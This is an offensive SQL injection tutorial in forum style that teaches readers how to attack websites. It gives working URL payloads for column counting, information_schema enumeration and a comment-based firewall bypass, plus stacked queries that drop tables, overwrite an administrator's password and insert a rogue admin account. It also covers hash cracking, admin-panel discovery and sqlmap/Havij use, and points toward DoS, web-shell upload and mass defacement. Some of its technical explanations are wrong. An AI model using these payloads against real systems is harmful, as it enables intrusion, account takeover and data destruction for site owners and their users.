Today I'll write an tutorial for you what covers most problems while doing
SQL injection and
solutions to them. Probably every person who has looked at tutorials to hack a website have noticed that there are too much
SQL tutorials. Almost every forum has 10 tutorials and blogs 5 tutorials about SQL injection, but actually those tutorials are stolen from somewhere else and the author doesn't probably even know why does SQL injection work. All of those tutorials are like
textbooks
with their ABC's and the result is just a mess. Everyone are writing
tutorials about SQL, but nobody covers the problems what will come with
that attack.
What is the cause of most problems related to SQL injection?
Webdevelopers aren't always really dumb and they have also heard of hackers and have implemented some
security
measures like WAF or manual protetion. WAF is an Web application
firewall and will block all malicous requests, but WAF's are quite easy
to bypass. Nobody would like to have their site hacked and they are also
implementing some security, but ofcourse it would be false to say that
if we fail then it's the servers fault. There's also a huge possibility
that we're injecting otherwise than we should.
A web application firewall (WAF) is an appliance, server plugin, or
filter that applies a set of rules to an HTTP conversation. Generally,
these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection.
By customizing the rules to your application, many attacks can be
identified and blocked. The effort to perform this customization can be
significant and needs to be maintained as the application is modified.
If you're interested about WAF's and how they're working then I suggest
to read it from wikipedia
http://en.wikipedia.org/wiki/Application_firewall
Order by is being blocked?
It rarely happens, but sometimes you can't use order by because the WAF
has blocked it or some other reasons. Unfortunally we can't skip the
order by and we have to find another way. The way is simple, instead of
using Order by we have to use
Group by because that's very unlikely to be blacklisted by the WAF.
If that request will return 'forbidden' then it means it's blocked.
If that request will return 'forbidden' then it means it's blocked.
http://site.com/gallery?id=1 order by 100--
Then you have to try to use Group by and it will return correct :
http://site.com/gallery?id=1 group by 100-- / success
Still there's an possibility that WAF will block the request, but
there's on other way also and that's not very widely known. It's about
using ( the main query ) = (select 1)
http://example.org/news.php?id=8 and (select * from admins)=(select 1)
Then you'll probably recive an error like this :
Operand should contain 5 column(s).
That error means there are 5 columns and it means we can proceed to our
next step what's union select. The command was different than usual, but
the further injection will be the same.
http://site.com/news.php?id=-8 union select 1,2,3,4,5--
'order by 10000' and still not error?
That's an small chapter where I'll tell you why sometimes order by won't
work and you don't see an error. The difference between this capther
and the last one is that previously your requests were blocked by the
WAF, but here's the injection method is just a littlebit different. When
I saw that on my first time then I thought how does a Database have
100000 columns because I'm not getting the error while the site is
vulnerable?
The answer is quite logical. By trying order by 1000000 we're not
getting the error because there are so many columns in there, we're not
getting the error because our injecting isn't working.
Example : site.com/news.php?id=9 order by 10000000000-- [No Error]
to bypass this you just have to change the URL littlebit.Add ' after the ID number and at the end just enter +
Example :
site.com/news.php?id=9' order by 10000000--+[Error]
If the last example is working for you then it means you have to use it
in the next steps also, there isn't anything complicated, but to make
everything clear I'll still make an example.
http://site.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+
Extracting data from other database.
Sometimes we can inject succesfully and there doesn't appear any error,
it's just like a hackers dream. That dream will end at the moment when
we'll see that there doesn't exist anything useful to us. There are only
few tables and are called "News", "gallery" and "articles". They aren't
useful at all to us because we'd like to see tables like "Admin" or
"Administrator". Still we know that the server probably has several
databases and even if we have found the information we're looking for,
you should still take a look in the other databases also.
This will give you Schema names.
site.com/news.php?id=9 union select 1,2,group_concat(schema_name),4 from information_schema.schemata
And with this code you can get the tables from the schema.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x
This code will give you the column names.
site.com/news.php?id=9 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x and table_name=0x
I get error if I try to extract tables.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables
Le wild Error appears.
"you have an error in your sql syntax near '' at line 1"
Change the URL for this
site.com/news.php?id=9 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1--
How to bypass WAF/Web application firewall
The biggest reason why most of reasons are appearing are because of security
measures added to the server and WAF is the biggest reason, but mostly
they're made really badly and can be bypassed really easily. Mostly you
will get error 404 like it's in the code below, this is WAF. Most likely
persons who're into SQL injection and bypassing WAF's are thinking at
the moment "Dude, only one bypassing method?", but in this case we both
know that bypassing WAF's is different kind of science and I could write
a ebook on bypassing these. I'll keep all those bypassing queries to
another time and won't cover that this time.
"404 forbidden you do not have permission to access to this webpage"
The code will look like this if you get the error
http://www.site.com/index.php?id=-1+union+select+1,2,3,4,5--
[Error]
Change the url Like it's below.
http://www.site.com/index.php?id=-1+/*!UnIoN*/+/*!sELeCt*/1,2,3,4,5--
[No error]
Is it possible to modify the information in the database by SQL injection?
Most of people aren't aware of it, but it's possible. You're able to
Update, Drop, insert and select information. Most of people who're
dealing with SQL injection has never looked deeper in the attack than shown in the average
SQL injection tutorial, but an average SQL injection tutorial
doesn't have those statements added. Most likely because most of people
are copy&pasting tutorials or just overwriting them. You might ask
that why should one update, drop or insert information into the database
if I can just look into the information to use the current ones, why
should we make another Administrator account if there already exists
one?
Reading the information is just one part of the injection and sometimes
those other commands what are quite infamous are more powerful than we
thought. If you have read all those avalible SQL injection tutorials
then you're probably aware that you can read the information, but you
didn't knew you're able to modify it. If you have tried SQL injecting
then you have probably faced some problems that there aren't
administrator account, why not to use the Insert command to add one?
There aren't admin page to login, why not to drop the table and all
information so nobody could access it? I want to get rid of the current
Administrator and can't change his password, why not to use the update
commands to change the password of the Administrator?
You have probably noticed that I have talked alot about unneccesary
information what you probably don't need to know, but that's an
information you need to learn and understand to become a real hacker
because you have to learn how SQL databases are working to fiqure it out
how those commands are working because you can't find tutorials about
it from the network. It's just like math you learn in school, if you
won't learn it then you'll be in trouble when you grow up.
Theory is almost over and now let's get to the practice.
Let's say that we're visiting that page and it's vulnerable to SQL injection.
http://site.com/news.php?id=1
You have to start injecting to look at the tables and columns in them,
but let's assume that the current table is named as "News".
With SQL injection you can SELECT, DROP, UPDATE and INSERT information
to the database. The SELECT is probably already covered at all the
tutorials so let's focus on the other three. Let's start with the DROP
command.
I'd like to get rid of a table, how to do it?
http://site.com/news.php?id=1; DROP TABLE news
That seems easy, we have just dropped the table. I'd explain what we did
in the above statement, but it's quite hard to explain it because you
all can understand the above command. Unfortunally most of 'hackers'
who're making tutorials on SQL injection aren't aware of it and
sometimes that three words are more important than all the information
we can read on some tutorials.
Let's head to the next statement what's UPDATE.
http://site.com/news.php?id=1; UPDATE 'Table name' SET 'data you want to edit' = 'new data' WHERE column_name='information'--
Above explanation might be quite confusing so I'll add an query what you're most likely going to use in real life :
http://site.com/news.php?id=1; UPDATE 'admin_login' SET 'password' = 'Crackhackforum' WHERE login_name='Rynaldo'--
We have just updated Administrator account's password.In the above
example we updated the column called 'admin_login" and added a password
what is "Crackhackforum" and that credentials belongs to account which's
username is Rynaldo. Kinda heavy to explain, but I hope you'll
understand.
How does INSERT work?
Luckily "INSERT" isn't that easy as the "DROP" statement is, but still
quite understandable. Let's go further with Administrator privileges
because that's what most of people are heading to. Adding an
administrator account would be like this :
http://site.com/news.php?id=1; INSERT INTO 'admin_login' ('login_id',
'login_name', 'password', 'details') VALUES
(2,'Rynaldo','Crackhackforum','NA')--
INSERT INTO 'admin_login' means that we're inserting something to
'admin_login'. Now we have to give instructions to the database what
exact information we want to add, ('login_id', 'login_name', 'password',
'details') means that the specifications we're adding to the DB are
Login_id, Login_name, password and details and those are the information
the database needs to create a new account. So far we have told the
database what information we want to add, we want to add new account,
password to it, account ID and details. Now we have to tell the database
what will be the new account's username, it's password and account ID,
VALUES (2,'Rynaldo','Crackhackforum','NA')-- . That means account ID is
2, username will be Rynaldo, password of the account will be
Crackhackforum. Your new account has been added to the database and all
you have to do is opening up the Administrator page and login.
Passwords aren't working
Sometimes the site is vulnerable to SQL and you can get the
passwords.Then you can find the sites username and password, but when
you enter it into adminpanel then it shows "Wrong password".This can be
because those usernames and passwords are there, but aren't working.
This is made by site's admin to confuse you and actually the Cpanel
doesn't contain any username/password. Sometimes are accounts removed,
but the accounts are still in the database. Sometimes it isn't made by
the admin and those credentials has been left in the database after
removing the login page, sometimes the real credentials has been
transfered to another database and old entries hasn't been deleted.
Sometimes i get some weird password
This weird password is called Hash and most likely it's MD5 hash.That
means the sites admin has added more security to the website and has
encrypted the passwords.Most popular crypting way is using MD5 hash.The
best way to crack MD5 hashes is using PasswordsPro or Hashcat because
they're the best and can crack the password even if it's really hard or
isn't MD5. Also you can use http://md5decrypter.com .I don't like to be a
person who's pitching around with small details what aren't correct,
but here's an tip what you should keep in mind. The domain is saying
it's "md5decryptor" what reffers to decrypting MD5 hashes. Actually it's
not possible to decrypt a hash because they're having 'one-way'
encryption. One way encryption means it can only be encrypted, but not
decrypted. Still it doesn't mean that we can't know what does the hash
mean, we have to crack it. Hashes can't be decrypted, only cracked.
Those online sites aren't cracking hashes every time, they're saving
already cracked hashes & results to their database and if you'll ask
an hash what's already in their database, you will get the result. :)
Md5 hash looks like this : 827ccb0eea8a706c4c34a16891f84e7b = 12345
You can read about all Hashes what exist and their description http://pastebin.com/aiyxhQsf
Md5 hashes can't be decrypted, only cracked
How to find admin page of site?
Some sites doesn't contain admin control panel and that means you can
use any method for finding the admin page, but that doesn't even exist.
You might ask "I got the username and password from the database, why
isn't there any admin login page then?", but sometimes they are just
left in the database after removing the Cpanel.
Mostly people are using tools called "Admin page finders".They have some
specific list of pages and will try them.If the page will give HTTP
response 200 then it means the page exists, but if the server responds
with HTTP response 404 then it means the page doesn't exist in there.If
the page exist what is in the list then tool will say "Page found".I
don't have any tool to share at the moment, but if you're downloading it
yourself then be beware because there are most of those tools infected
with virus's.
Mostly the tools I mentioned above, Admin Page Finders doesn't usually
find the administrator page if it's costumly made or renamed. That means
quite oftenly those tools doesn't help us out and we have to use an
alternative and I think the best one is by using site crawlers. Most of
you are probably having Acunetix Web Vulnerability scanner 8 and it has
one wonderful feature called site crawler. It'll show you all the pages
on the site and will %100 find the login page if there exists one in the
page.
Automated SQL injection tools.
Automated SQL injection tools are programs what will do the whole work
for you, sometimes they will even crack the hashes and will find the
Administrator page for you. Most of people are using automated SQL
injection tools and most popular of them are Havij and SQLmap. Havij is
being used much more than SQLmap nomatter the other tool is much better
for that injection. The sad truth why that's so is that many people
aren't even able to run SQLmap and those persons are called
script-kiddies. Being a script-kiddie is the worstest thing you can be
in the hacking world and if you won't learn how to perform the attack
manually and are only using tools then you're one of them. If you're
using those tools to perform the attack then most of people will think
that you're a script-kiddie because most likely you are. Proffesionals
won't take you seriusly if you're injecting with them and you won't
become a real hacker neither. My above text might give you an question,
"But I've seen that even Proffesional hackers are using SQLmap?" and I'd
like to say that everything isn't always black & white. If there
are 10 databases, 50 tables in them and 100 columns in the table then it
would just take days to proccess all that information.I'm also
sometimes using automated tools because it makes my life easier, but to
use those tools you first have to learn how to use those tools manually
and that's what the tutorial above is teaching you.
Use automated tools only to make your life easier, but don't even look
at them if you don't know how to perform the attack manually.
What else can I do with SQL injection besides extracting information?
There are many things besides extracting information from the database
and sometimes they are much more powerful. We have talked above that
sometimes the database doesn't contain Administrator's credentials or
you can't crack the hashes. Then all the injection seems pointless
because we can't use the information we have got from the database.
Still we can use few another methods. Just like we can conduct CSRF
attack with persistent XSS, we can also move to another attacks through
SQL injection. One of the solution would be performing DOS attack on the
website which is vulnerable to SQL injection. DOS is shortened from
Denial of service and it's tottaly different from DDOS what's
Distributed Denial of Service. I think that you all probably know what
these are, but if I'm taking that attack up with a sentence then DOS
will allow us to take down the website temporarely so users wouldn't
have access to the site. The other way would be uploading our shell
through SQL injection. If you're having a question about what's shell
then by saying it shortly, it's a script what we'll upload to the server
and it will create an backdoor for us and will give us all the
privileges to do what we'd like in the server and sometimes by uploading
a shell you're having more rights to modify things than the real
Administrator has. After you have uploaded a shell you can move forward
to symlink what means we can deface all the sites what are sharing the
same server. Shelling the website is probably most powerful thing you
can use on the website. I have not covered how to upload a shell through
SQL injection and haven't covered how to cause DOS neither, but
probably will do in my next tutorials because uploading a shell through
SQL is another kind of science, just like bypassing WAF's. Those are the
most common methods what attackers will put in use after they can't get
anything useful out of the database. Ofcourse every website doesn't
have the same vulnerabilities and they aren't responding always like we
want and by that I mean we can't perform those attacks on all
websites.We have all heard that immagination is unlimited and you can do
whatever you'd like. That's kinda true and hacking isn't an exception,
there are more ways than I can count.
What to do if all the information doesn't display on the page?
I actually have really rarely seen that there are so much information on
the webpage that it all just don't fit in there, but one person
recently asked that question from me and I decided to add it here. Also
if you're having questions then surely ask and I'll update the article.
If we're getting back to the question then the answer is simple, if all
the information can't fit in the screen then you have to look at the
source code because everything displayed on the webpage will be in
there. Also sometimes information will appear in the tab where usually
is the site's name. If you can't see the information then sometimes it's
hiddened, but with taking a deeper look you might find it from the
source. That's why you always have to look all the solutions out before
quiting because sometimes you might think "I can't inject into that..",
but actually the answer is hiddened in the source.
What is the purpose of '--' in the union+select+1,2,3,4,5-- ?I
suggest to read about null-byte's and here's a good explanation about
it : http://en.wikipedia.org/wiki/Null_character because it might give
you some hint why -- is being used . Purpose of adding -- in the end of
the URL isn't always neccesary and it depends on the target. It doesn't
have any influence to the injection because it doesn't mean anything,
but it's still being used because it's used as end of query. It means if
I'm injecting as : http://site.com/news.php?id=-1 union select
1,2,3,4,5-- asasdasd then the server will skip everything after -- and
asasdasd won't be readed. It's just like adding to masking a shell.
Sometimes injection isn't working if -- is missing because -- tells the
DB that "I'm the end of query, don't read anything what comes after me
and execute everything infront of me". It's just like writing a sentence
without a dot, people might think it's not the end of your sentence and
will wait until you write the other part of the sentence and the end
will come if you add the dot to your sentence.
